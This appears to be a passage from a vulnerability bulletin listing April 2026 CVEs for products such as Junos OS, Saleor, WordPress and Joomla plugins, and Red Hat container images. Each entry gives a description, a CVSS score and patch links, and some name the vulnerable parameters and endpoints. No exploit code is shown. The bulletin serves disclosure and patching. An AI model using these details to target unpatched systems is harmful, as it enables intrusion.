    Published: 2026-04-10 | CVSS: 7.5 | CVE-2026-33710 [ https://www.cve.org/CVERecord?id=CVE-2026-33710 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rpmg-j327-mr39
    https://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe9c49c2d09
    https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a2374f3d269a9a9d

    saleor--saleor
    Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching by submitting multiple GraphQL operations in a single HTTP request as a JSON array, but it did not enforce any upper limit on the number of operations. This allowed an unauthenticated attacker to send many operations in a single HTTP request (bypassing the per-query complexity limit) and exhaust resources. This vulnerability is fixed in 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118.
    Published: 2026-04-08 | CVSS: 7.5 | CVE-2026-33756 [ https://www.cve.org/CVERecord?id=CVE-2026-33756 ]
    Source:
    https://github.com/saleor/saleor/security/advisories/GHSA-24jw-f244-qfpp
    https://github.com/saleor/saleor/commit/7be352fa8c35875d6e66d36493ca7c14c101bd64
    https://github.com/saleor/saleor/commit/cdb66da97abb7c86939e384914cd8d9194f378e8
    https://github.com/saleor/saleor/commit/d6a94e95bd77f3f733fa66afd1b1ac72e863ca2a
    https://github.com/saleor/saleor/commit/e42aa4d6e588982e78942b033af051c8ec8f43fa
    https://github.com/saleor/saleor/commit/f0371bdd4cafcc841f1a9e7049cead6133bf7464

    Juniper Networks--CTP OS
    A Weak Password Requirements vulnerability in the password management function of Juniper Networks CTP OS might allow an unauthenticated, network-based attacker to exploit weak passwords of local accounts and potentially take full control of the device. The password management menu enables the administrator to set password complexity requirements, but these settings are not saved. The issue can be verified with the menu option "Show password requirements". Failure to enforce the intended requirements can lead to weak passwords being used, which significantly increases the likelihood that an attacker can guess these and subsequently attain unauthorized access. This issue affects CTP OS versions 9.2R1 and 9.2R2.
    Published: 2026-04-09 | CVSS: 7.4 | CVE-2026-33771 [ https://www.cve.org/CVERecord?id=CVE-2026-33771 ]
    Source: https://kb.juniper.net/JSA107864

    Juniper Networks--Junos OS
    An Improper Validation of Syntactic Correctness of Input vulnerability in the IPsec library used by kmd and iked of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a complete Denial-of-Service (DoS). If an affected device receives a specifically malformed first ISAKMP packet from the initiator, the kmd/iked process will crash and restart, which momentarily prevents new security associations (SAs) from being established. Repeated exploitation of this vulnerability causes a complete inability to establish new VPN connections. This issue affects Junos OS on SRX Series and MX Series:
    * all versions before 22.4R3-S9,
    * 23.2 versions before 23.2R2-S6,
    * 23.4 versions before 23.4R2-S7,
    * 24.2 versions before 24.2R2-S4,
    * 24.4 versions before 24.4R2-S3,
    * 25.2 versions before 25.2R1-S2, 25.2R2.
    Published: 2026-04-09 | CVSS: 7.5 | CVE-2026-33778 [ https://www.cve.org/CVERecord?id=CVE-2026-33778 ]
    Source: https://kb.juniper.net/JSA107868

    Juniper Networks--Junos OS Evolved
    A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs installed in the device. A local user with low privileges can gain direct access to the installed FPCs as a high privileged user, which can potentially lead to a full compromise of the affected component. This issue affects Junos OS Evolved on PTX10004, PTX10008, PTX100016, with JNP10K-LC1201 or JNP10K-LC1202:
    * All versions before 21.2R3-S8-EVO,
    * 21.4-EVO versions before 21.4R3-S7-EVO,
    * 22.2-EVO versions before 22.2R3-S4-EVO,
    * 22.3-EVO versions before 22.3R3-S3-EVO,
    * 22.4-EVO versions before 22.4R3-S2-EVO,
    * 23.2-EVO versions before 23.2R2-EVO.
    Published: 2026-04-09 | CVSS: 7.8 | CVE-2026-33788 [ https://www.cve.org/CVERecord?id=CVE-2026-33788 ]
    Source: https://kb.juniper.net/JSA107806

    Juniper Networks--Junos OS
    An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition. During NAT64 translation, receipt of a specific, malformed ICMPv6 packet destined to the device will cause the srxpfe process to crash and restart. This issue cannot be triggered using IPv4 or other IPv6 traffic. This issue affects Junos OS on SRX Series:
    * all versions before 21.2R3-S10,
    * all versions of 21.3,
    * from 21.4 before 21.4R3-S12,
    * all versions of 22.1,
    * from 22.2 before 22.2R3-S8,
    * all versions of 22.4,
    * from 22.4 before 22.4R3-S9,
    * from 23.2 before 23.2R2-S6,
    * from 23.4 before 23.4R2-S7,
    * from 24.2 before 24.2R2-S3,
    * from 24.4 before 24.4R2-S3,
    * from 25.2 before 25.2R1-S2, 25.2R2.
    Published: 2026-04-09 | CVSS: 7.5 | CVE-2026-33790 [ https://www.cve.org/CVERecord?id=CVE-2026-33790 ]
    Source: https://kb.juniper.net/JSA107874

    Juniper Networks--Junos OS
    An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system. When a configuration that allows unsigned Python op scripts is present on the device, a non-root user is able to execute malicious op scripts as a root-equivalent user, leading to privilege escalation. This issue affects Junos OS:
    * All versions before 22.4R3-S7,
    * from 23.2 before 23.2R2-S4,
    * from 23.4 before 23.4R2-S6,
    * from 24.2 before 24.2R1-S2, 24.2R2,
    * from 24.4 before 24.4R1-S2, 24.4R2;
    Junos OS Evolved:
    * All versions before 22.4R3-S7-EVO,
    * from 23.2 before 23.2R2-S4-EVO,
    * from 23.4 before 23.4R2-S6-EVO,
    * from 24.2 before 24.2R2-EVO,
    * from 24.4 before 24.4R1-S1-EVO, 24.4R2-EVO.
    Published: 2026-04-09 | CVSS: 7.8 | CVE-2026-33793 [ https://www.cve.org/CVERecord?id=CVE-2026-33793 ]
    Source: https://kb.juniper.net/JSA103142

    Juniper Networks--Junos OS
    An Improper Input Validation vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker sending a specific genuine BGP packet in an already established BGP session to reset only that session, causing a Denial of Service (DoS). An attacker repeatedly sending the packet will sustain the Denial of Service (DoS). This issue affects Junos OS:
    * 25.2 versions before 25.2R2.
    This issue does not affect Junos OS versions before 25.2R1. This issue affects Junos OS Evolved:
    * 25.2-EVO versions before 25.2R2-EVO.
    This issue does not affect Junos OS Evolved versions before 25.2R1-EVO. eBGP and iBGP are affected. IPv4 and IPv6 are affected.
    Published: 2026-04-09 | CVSS: 7.4 | CVE-2026-33797 [ https://www.cve.org/CVERecord?id=CVE-2026-33797 ]
    Source: https://kb.juniper.net/JSA107850

    shamimmoeen -- WCAPF Ajax Product Filter for WooCommerce
    The WCAPF - WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
    Published: 2026-04-08  CVSS: 7.5  Source Info: CVE-2026-3396 [ https://www.cve.org/CVERecord?id=CVE-2026-3396 ]
    Patch Info:
    https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0a762e-9159-4dab-a7be-9cbe332effb1?source=cve
    https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L739
    https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L689
    https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L81
    https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L65
    https://plugins.trac.wordpress.org/changeset/3484080/

    @fedify -- fedify
    Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to 1.9.6, 1.10.5, 2.0.8, and 2.1.1, @fedify/fedify follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service. This vulnerability is fixed in 1.9.6, 1.10.5, 2.0.8, and 2.1.1.
    Published: 2026-04-06  CVSS: 7.5  Source Info: CVE-2026-34148 [ https://www.cve.org/CVERecord?id=CVE-2026-34148 ]
    Patch Info:
    https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp
    https://github.com/fedify-dev/fedify/releases/tag/1.10.5
    https://github.com/fedify-dev/fedify/releases/tag/1.9.6
    https://github.com/fedify-dev/fedify/releases/tag/2.0.8
    https://github.com/fedify-dev/fedify/releases/tag/2.1.1

    AcademySoftwareFoundation -- openexr
    OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a misaligned memory write vulnerability exists in LossyDctDecoder_execute() in src/lib/OpenEXRCore/internal_dwa_decoder.h:749. When decoding a DWA or DWAB-compressed EXR file containing a FLOAT-type channel, the decoder performs an in-place HALF→FLOAT conversion by casting an unaligned uint8_t * row pointer to float * and writing through it. Because the row buffer may not be 4-byte aligned, this constitutes undefined behavior under the C standard and crashes immediately on architectures that enforce alignment (ARM, RISC-V, etc.). On x86 it is silently tolerated at runtime but remains exploitable via compiler optimizations that assume aligned access. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9.
    Published: 2026-04-06  CVSS: 7.1  Source Info: CVE-2026-34379 [ https://www.cve.org/CVERecord?id=CVE-2026-34379 ]
    Patch Info:
    https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-w88v-vqhq-5p24
    https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7
    https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9
    https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9

    aces -- Loris
    LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static file router can allow an attacker to traverse outside of the intended directory, allowing unintended files to be downloaded through the static, css, and js endpoints. This vulnerability is fixed in 27.0.3 and 28.0.1.
    Published: 2026-04-08  CVSS: 7.5  Source Info: CVE-2026-34392 [ https://www.cve.org/CVERecord?id=CVE-2026-34392 ]
    Patch Info: https://github.com/aces/Loris/security/advisories/GHSA-rfj5-58hv-wc5f

    go-vikunja -- vikunja
    Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the OIDC callback handler issues a full JWT token without checking whether the matched user has TOTP two-factor authentication enabled. When a local user with TOTP enrolled is matched via the OIDC email fallback mechanism, the second factor is completely skipped. This vulnerability is fixed in 2.3.0.
    Published: 2026-04-10  CVSS: 7.4  Source Info: CVE-2026-34727 [ https://www.cve.org/CVERecord?id=CVE-2026-34727 ]
    Patch Info: https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg

    HDFGroup -- hdf5
    HDF5 is software for managing data. In 1.14.1-2 and earlier, a heap-use-after-free was found in the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term.
    Published: 2026-04-09  CVSS: 7.8  Source Info: CVE-2026-34734 [ https://www.cve.org/CVERecord?id=CVE-2026-34734 ]
    Patch Info: https://github.com/HDFGroup/hdf5/security/advisories/GHSA-w7v2-9cmr-pwwj

    Analytify -- Under Construction, Coming Soon & Maintenance Mode
    Cross-Site Request Forgery (CSRF) vulnerability in Analytify Under Construction, Coming Soon & Maintenance Mode allows Cross Site Request Forgery. This issue affects Under Construction, Coming Soon & Maintenance Mode: from n/a through 2.1.1.
    Published: 2026-04-07  CVSS: 7.5  Source Info: CVE-2026-34896 [ https://www.cve.org/CVERecord?id=CVE-2026-34896 ]
    Patch Info: https://patchstack.com/database/wordpress/plugin/under-construction-maintenance-mode/vulnerability/wordpress-under-construction-coming-soon-maintenance-mode-plugin-2-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve

    Analytify -- Simple Social Media Share Buttons
    Cross-Site Request Forgery (CSRF) vulnerability in Analytify Simple Social Media Share Buttons allows Cross Site Request Forgery. This issue affects Simple Social Media Share Buttons: from n/a through 6.2.0.
    Published: 2026-04-07  CVSS: 7.5  Source Info: CVE-2026-34904 [ https://www.cve.org/CVERecord?id=CVE-2026-34904 ]
    Patch Info: https://patchstack.com/database/wordpress/plugin/simple-social-buttons/vulnerability/wordpress-simple-social-media-share-buttons-plugin-6-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve

    Medium Vulnerabilities

    Columns: Primary Vendor -- Product, Description, Published, CVSS Score, Source Info, Patch Info

    Dynalon -- MDwiki
    MDwiki contains a cross-site scripting vulnerability that allows remote attackers to execute arbitrary JavaScript by injecting malicious code through the location hash parameter. Attackers can craft URLs with JavaScript payloads in the hash fragment that are parsed and rendered without sanitization, causing the injected scripts to execute in the victim's browser context.
    Published: 2026-04-12  CVSS: 6.1  Source Info: CVE-2017-20239 [ https://www.cve.org/CVERecord?id=CVE-2017-20239 ]
    Patch Info:
    ExploitDB-46097 [ https://www.exploit-db.com/exploits/46097 ]
    VulnCheck Advisory: MDwiki Cross-Site Scripting via Location Hash Parameter [ https://www.vulncheck.com/advisories/mdwiki-cross-site-scripting-via-location-hash-parameter ]

    NSauditor -- SpotFTP Password Recover
    SpotFTP Password Recover 2.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an oversized buffer in the Name field during registration. Attackers can generate a 256-byte payload, paste it into the Name input field, and trigger a crash when submitting the registration code.
    Published: 2026-04-12  CVSS: 6.2  Source Info: CVE-2019-25711 [ https://www.cve.org/CVERecord?id=CVE-2019-25711 ]
    Patch Info:
    ExploitDB-46088 [ https://www.exploit-db.com/exploits/46088 ]
    VulnCheck Advisory: SpotFTP Password Recover 2.4.2 Denial of Service via Name Field [ https://www.vulncheck.com/advisories/spotftp-password-recover-denial-of-service-via-name-field ]

    NSauditor -- BlueAuditor
    BlueAuditor 1.7.2.0 contains a buffer overflow vulnerability in the registration key field that allows local attackers to crash the application by submitting an oversized key value. Attackers can trigger a denial of service by entering a 256-byte buffer of repeated characters in the Key registration field, causing the application to crash during registration processing.
    Published: 2026-04-12  CVSS: 6.2  Source Info: CVE-2019-25712 [ https://www.cve.org/CVERecord?id=CVE-2019-25712 ]
    Patch Info:
    ExploitDB-46087 [ https://www.exploit-db.com/exploits/46087 ]
    VulnCheck Advisory: BlueAuditor 1.7.2.0 Buffer Overflow Denial of Service via Registration Key [ https://www.vulncheck.com/advisories/blueauditor-buffer-overflow-denial-of-service-via-registration-key ]

    Synology -- Synology SSL VPN Client
    A files or directories accessible to external parties vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access files within the installation directory via a local HTTP server bound to the loopback interface. By leveraging user interaction with a crafted web page, attackers may retrieve sensitive files such as configuration files, certificates, and logs, leading to information disclosure.
    Published: 2026-04-10  CVSS: 6.5  Source Info: CVE-2021-47960 [ https://www.cve.org/CVERecord?id=CVE-2021-47960 ]
    Patch Info: Synology-SA-26:05 Synology SSL VPN Client [ https://www.synology.com/en-global/security/advisory/Synology_SA_26_05 ]

    Adivaha -- WordPress adivaha Travel Plugin
    WordPress adivaha Travel Plugin 2.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the isMobile parameter. Attackers can craft malicious URLs containing JavaScript payloads in the isMobile GET parameter at the /mobile-app/v3/ endpoint to execute arbitrary code in victims' browsers and steal session tokens or credentials.
    Published: 2026-04-09  CVSS: 6.1  Source Info: CVE-2023-54358 [ https://www.cve.org/CVERecord?id=CVE-2023-54358 ]
    Patch Info:
    ExploitDB-51663 [ https://www.exploit-db.com/exploits/51663 ]
    Official Product Homepage [ https://www.adivaha.com/ ]
    Product Reference [ https://wordpress.org/plugins/adiaha-hotel/ ]
    VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 Reflected XSS via isMobile [ https://www.vulncheck.com/advisories/wordpress-adivaha-travel-plugin-reflected-xss-via-ismobile ]

    Jlexart -- Joomla JLex Review
    Joomla JLex Review 6.0.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the review_id URL parameter. Attackers can craft malicious links containing JavaScript payloads that execute in victims' browsers when clicked, enabling session hijacking or credential theft.
    Published: 2026-04-09  CVSS: 6.1  Source Info: CVE-2023-54360 [ https://www.cve.org/CVERecord?id=CVE-2023-54360 ]
    Patch Info:
    ExploitDB-51645 [ https://www.exploit-db.com/exploits/51645 ]
    Official Product Homepage [ https://jlexart.com/ ]
    Product Reference [ https://extensions.joomla.org/extension/jlex-review/ ]
    VulnCheck Advisory: Joomla JLex Review 6.0.1 Reflected XSS via review_id Parameter [ https://www.vulncheck.com/advisories/joomla-jlex-review-reflected-xss-via-review-id-parameter ]

    Thethinkery -- Joomla iProperty Real Estate
    Joomla iProperty Real Estate 4.1.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the filter_keyword parameter. Attackers can craft URLs containing JavaScript payloads in the filter_keyword GET parameter of the all-properties-with-map endpoint to execute arbitrary code in victim browsers and steal session tokens or credentials.
    Published: 2026-04-09  CVSS: 6.1  Source Info: CVE-2023-54361 [ https://www.cve.org/CVERecord?id=CVE-2023-54361 ]
    Patch Info:
    ExploitDB-51640 [ https://www.exploit-db.com/exploits/51640 ]
    Official Product Homepage [ http://thethinkery.net ]
    Product Reference [ https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/ ]
    VulnCheck Advisory: Joomla iProperty Real Estate 4.1.1 Reflected XSS via filter_keyword [ https://www.vulncheck.com/advisories/joomla-iproperty-real-estate-reflected-xss-via-filter-keyword ]

    Virtuemart -- Cart
    Joomla VirtueMart Shopping-Cart 4.0.12 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the keyword parameter. Attackers can craft malicious URLs containing script payloads in the keyword parameter of the product-variants endpoint to execute arbitrary JavaScript in victim browsers and steal session tokens or credentials.
    Published: 2026-04-09  CVSS: 6.1  Source Info: CVE-2023-54362 [ https://www.cve.org/CVERecord?id=CVE-2023-54362 ]
    Patch Info:
    ExploitDB-51631 [ https://www.exploit-db.com/exploits/51631 ]
    Official Product Homepage [ https://www.virtuemart.net/ ]
    Product Reference [ https://demo.virtuemart.net/ ]
    VulnCheck Advisory: Joomla VirtueMart Shopping-Cart 4.0.12 Reflected XSS via keyword [ https://www.vulncheck.com/advisories/joomla-virtuemart-shopping-cart-reflected-xss-via-keyword ]

    Solidres -- Joomla Solidres
    Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating multiple GET parameters including show, reviews, type_id, distance, facilities, categories, prices, location, and Itemid. Attackers can craft malicious URLs containing JavaScript payloads in these parameters to steal session tokens, login credentials, or manipulate site content when victims visit the crafted links.
    Published: 2026-04-09  CVSS: 6.1  Source Info: CVE-2023-54363 [ https://www.cve.org/CVERecord?id=CVE-2023-54363 ]
    Patch Info:
    ExploitDB-51638 [ https://www.exploit-db.com/exploits/51638 ]
    Official Product Homepage [ http://solidres.com/ ]
    Product Reference [ https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/ ]
    VulnCheck Advisory: Joomla Solidres 2.13.3 Reflected XSS via Multiple Parameters [ https://www.vulncheck.com/advisories/joomla-solidres-reflected-xss-via-multiple-parameters ]

    Hikashop -- Joomla HikaShop
    Joomla HikaShop 4.7.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating GET parameters in the product filter endpoint. Attackers can craft malicious URLs containing XSS payloads in the from_option, from_ctrl, from_task, or from_itemid parameters to steal session tokens or login credentials when victims visit the link.
    Published: 2026-04-09  CVSS: 6.1  Source Info: CVE-2023-54364 [ https://www.cve.org/CVERecord?id=CVE-2023-54364 ]
    Patch Info:
    ExploitDB-51629 [ https://www.exploit-db.com/exploits/51629 ]
    Official Product Homepage [ https://www.hikashop.com/ ]
    Product Reference [ https://demo.hikashop.com/index.php/en/ ]
    VulnCheck Advisory: Joomla HikaShop 4.7.4 Reflected XSS via Product Filter [ https://www.vulncheck.com/advisories/joomla-hikashop-reflected-xss-via-product-filter ]

    IBM -- Concert
    IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
    Published: 2026-04-07  CVSS: 6.2  Source Info: CVE-2025-13044 [ https://www.cve.org/CVERecord?id=CVE-2025-13044 ]
    Patch Info: https://www.ibm.com/support/pages/node/7268620

    elemntor -- Elementor Website Builder more than just a page builder
    The Elementor Website Builder - More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widget parameters in all versions up to, and including, 3.35.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
    Published: 2026-04-08  CVSS: 6.4  Source Info: CVE-2025-14732 [ https://www.cve.org/CVERecord?id=CVE-2025-14732 ]
    Patch Info:
    https://www.wordfence.com/threat-intel/vulnerabilities/id/20232d70-72b2-47b7-ac7e-ad07892864ef?source=cve
    https://plugins.trac.wordpress.org/browser/elementor/trunk/modules/wp-rest/classes/elementor-post-meta.php#L67
    https://plugins.trac.wordpress.org/changeset?old_path=/elementor/tags/3.35.5&new_path=/elementor/tags/3.35.6

    Juniper Networks -- Junos OS
    A Missing Authentication for Critical Function vulnerability in command processing of Juniper Networks Junos OS allows a privileged local attacker to gain access to line cards running Junos OS Evolved as root. This issue affects systems running Junos OS using Linux-based line cards. Affected line cards include:
    * MPC7, MPC8, MPC9, MPC10, MPC11
    * LC2101, LC2103
    * LC480, LC4800, LC9600
    * MX304 (built-in FPC)
    * MX-SPC3
    * SRX5K-SPC3
    * EX9200-40XS
    * FPC3-PTX-U2, FPC3-PTX-U3
    * FPC3-SFF-PTX
    * LC1101, LC1102, LC1104, LC1105
    This issue affects Junos OS:
    * all versions before 22.4R3-S8,
    * from 23.2 before 23.2R2-S6,
    * from 23.4 before 23.4R2-S6,
    * from 24.2 before 24.2R2-S3,
    * from 24.4 before 24.4R2,
    * from 25.2 before 25.2R2.
    Published: 2026-04-08  CVSS: 6.7  Source Info: CVE-2025-30650 [ https://www.cve.org/CVERecord?id=CVE-2025-30650 ]
    Patch Info:
    https://github.com/orangecertcc/security-research/security/advisories/GHSA-fwhc-gh5m-v8fq
    https://kb.juniper.net/JSA107863

    Qualcomm, Inc. -- Snapdragon
    Memory Corruption when accessing freed memory due to concurrent fence deregistration and signal handling.
    Published: 2026-04-06  CVSS: 6.5  Source Info: CVE-2025-47374 [ https://www.cve.org/CVERecord?id=CVE-2025-47374 ]
    Patch Info: https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

    Siklu -- EtherHaul 8010
    Siklu EtherHaul 8010 siklu-uimage-nxp-enc-10_6_2-18707-ea552dc00b devices have a static root password.
    Published: 2026-04-08  CVSS: 6.4  Source Info: CVE-2025-57175 [ https://www.cve.org/CVERecord?id=CVE-2025-57175 ]
    Patch Info: https://semaja2.net/2025/04/30/siklu-eh-firmware-decryption/

    Red Hat -- Red Hat Ansible Automation Platform 2
    A container privilege escalation flaw was found in certain Ansible Automation Platform images. This issue arises from the /etc/passwd file being created with group-writable permissions during the build process. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This vulnerability allows an attacker to add a new user with any arbitrary UID, including UID 0, gaining full root privileges within the container.
    Published: 2026-04-08  CVSS: 6.4  Source Info: CVE-2025-57847 [ https://www.cve.org/CVERecord?id=CVE-2025-57847 ]
    Patch Info:
    https://access.redhat.com/security/cve/CVE-2025-57847
    RHBZ#2391092 [ https://bugzilla.redhat.com/show_bug.cgi?id=2391092 ]

    Red Hat -- Multicluster Engine for Kubernetes
    A container privilege escalation flaw was found in certain Multicluster Engine for Kubernetes images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.
    Published: 2026-04-08  CVSS: 6.4  Source Info: CVE-2025-57851 [ https://www.cve.org/CVERecord?id=CVE-2025-57851 ]
    Patch Info:
    https://access.redhat.com/security/cve/CVE-2025-57851
    RHBZ#2391104 [ https://bugzilla.redhat.com/show_bug.cgi?id=2391104 ]

    Red Hat -- Red Hat Web Terminal
    A container privilege escalation flaw was found in certain Web Terminal images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.
    Published: 2026-04-08  CVSS: 6.4  Source Info: CVE-2025-57853 [ https://www.cve.org/CVERecord?id=CVE-2025-57853 ]
    Patch Info:
    https://access.redhat.com/security/cve/CVE-2025-57853
    RHBZ#2391106 [ https://bugzilla.redhat.com/show_bug.cgi?id=2391106 ]

    Red Hat -- Red Hat OpenShift Update Service
    A container privilege escalation flaw was found in certain OpenShift Update Service (OSUS) images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, may be able to leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.
    Published: 2026-04-08  CVSS: 6.4  Source Info: CVE-2025-57854 [ https://www.cve.org/CVERecord?id=CVE-2025-57854 ]
    Patch Info:
    https://access.redhat.com/security/cve/CVE-2025-57854
    RHBZ#2391107 [ https://bugzilla.redhat.com/show_bug.cgi?id=2391107 ]

    Red Hat -- Red Hat Process Automation 7
    A container privilege escalation flaw was found in certain Red Hat Process Automation Manager images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.
    Published: 2026-04-08  CVSS: 6.4  Source Info: CVE-2025-58713 [ https://www.cve.org/CVERecord?id=CVE-2025-58713 ]
    Patch Info:
    https://access.redhat.com/security/cve/CVE-2025-58713
    RHBZ#2394419 [ https://bugzilla.redhat.com/show_bug.cgi?id=2394419 ]

    Juniper Networks -- Junos OS Evolved
    A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in the advanced forwarding toolkit (evo-aftmand/evo-pfemand) of Juniper Networks Junos OS Evolved on PTX Series or QFX5000 Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). An attacker sending crafted multicast packets will cause line cards running evo-aftmand/evo-pfemand to crash and restart or non-line card devices to crash and restart. Continued receipt and processing of these packets will sustain the Denial of Service (DoS) condition.
    This issue affects Junos OS Evolved PTX Series:
    * All versions before 22.4R3-S8-EVO,
    * from 23.2 before 23.2R2-S5-EVO,
    * from 23.4 before 23.4R2-EVO,
    * from 24.2 before 24.2R2-EVO,
    * from 24.4 before 24.4R2-EVO.
    This issue affects Junos OS Evolved on QFX5000 Series:
    * 22.2-EVO version before 22.2R3-S7-EVO,
    * 22.4-EVO version before 22.4R3-S7-EVO,
    * 23.2-EVO versions before 23.2R2-S4-EVO,
    * 23.4-EVO versions before 23.4R2-S5-EVO,
    * 24.2-EVO versions before 24.2R2-S1-EVO,
    * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO.
    This issue does not affect Junos OS Evolved on QFX5000 Series versions before: 21.2R2-S1-EVO, 21.2R3-EVO, 21.3R2-EVO, 21.4R1-EVO, and 22.1R1-EVO.
    Published: 2026-04-09  CVSS: 6.5  Source Info: CVE-2025-59969 [ https://www.cve.org/CVERecord?id=CVE-2025-59969 ]
    Patch Info: https://kb.juniper.net/JSA103159

    GitLab -- GitLab
    GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to cause denial of service to the GitLab instance due to improper input validation in GraphQL queries.
    Published: 2026-04-08  CVSS: 6.5  Source Info: CVE-2026-1101 [ https://www.cve.org/CVERecord?id=CVE-2026-1101 ]
    Patch Info:
    HackerOne Bug Bounty Report #3460228 [ https://hackerone.com/reports/3460228 ]
    https://gitlab.com/gitlab-org/gitlab/-/work_items/586488
    https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/

    usystemsgmbh -- Webling
    The Webling plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.9.0 due to insufficient input sanitization, insufficient output escaping, and missing capabilities checks in the 'webling_admin_save_form' and 'webling_admin_save_memberlist' functions. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject Webling forms and memberlists with arbitrary web scripts that will execute whenever an administrator views the related form or memberlist area of the WordPress admin.
    Published: 2026-04-10  CVSS: 6.4  Source Info: CVE-2026-1263 [ https://www.cve.org/CVERecord?id=CVE-2026-1263 ]
    Patch Info:
    https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d-0709-4fa2-9294-393ddcd05b22?source=cve
